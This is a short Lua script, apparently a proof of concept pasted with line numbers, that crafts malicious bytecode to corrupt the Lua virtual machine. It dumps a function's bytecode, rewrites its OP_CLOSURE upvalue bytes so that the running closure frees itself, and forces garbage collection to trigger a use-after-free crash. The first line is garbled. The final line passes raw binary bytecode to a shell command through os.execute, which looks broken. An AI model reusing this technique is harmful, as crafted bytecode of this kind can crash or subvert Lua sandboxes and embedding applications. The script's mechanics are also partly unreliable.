function Evil() local Experimental, _2 Experimental = function()

1. function Evil()
2.   local Experimental, _2
3.  
4.   Experimental = function()
5.     -- Erase all references in the stack to this (currently running) function
6.     Experimental = nil
7.     _2 = nil -- (this line only does so after bytecode manipulation)
8.    
9.     -- Do some cycles of garbage collection to free ourselves, and some allocations to try and overwrite the memory
10.     for i = 1, 10 do
11.       collectgarbage "collect"
12.       alloc()
13.     end
14.    
15.     -- A segfault will probably now have occured
16.   end
17.  
18.   Experimental()
19. end
20.  
21. -- Do some bytecode manipulation of the Evil function
22. Es = ('').dump(Evil)
23. Es = Es:gsub("(\36..."      -- OP_CLOSURE
24.           .. "%z%z%z%z"     -- Use local 0 as upvalue 0
25.           .. "%z%z)\128%z"  -- Use local 1 as upvalue 1
26.           ,
27.              "%1\0\1")      -- OP_CLOSURE, using locals 0 and 2 as upvalues 0 and 1
28.                             -- (local 0 is the Experimental function, local 2 is where the function is placed for the call)
29. --Evil = loadstring(Es)
30.  
31. -- Function to trash some memory
32. function alloc()
33.   local t = {}
34.   for i = 1, 100 do
35.     t[i] = i
36.   end
37. end
38.  
39. -- Run the evil
40. os.execute("l51 "..Es)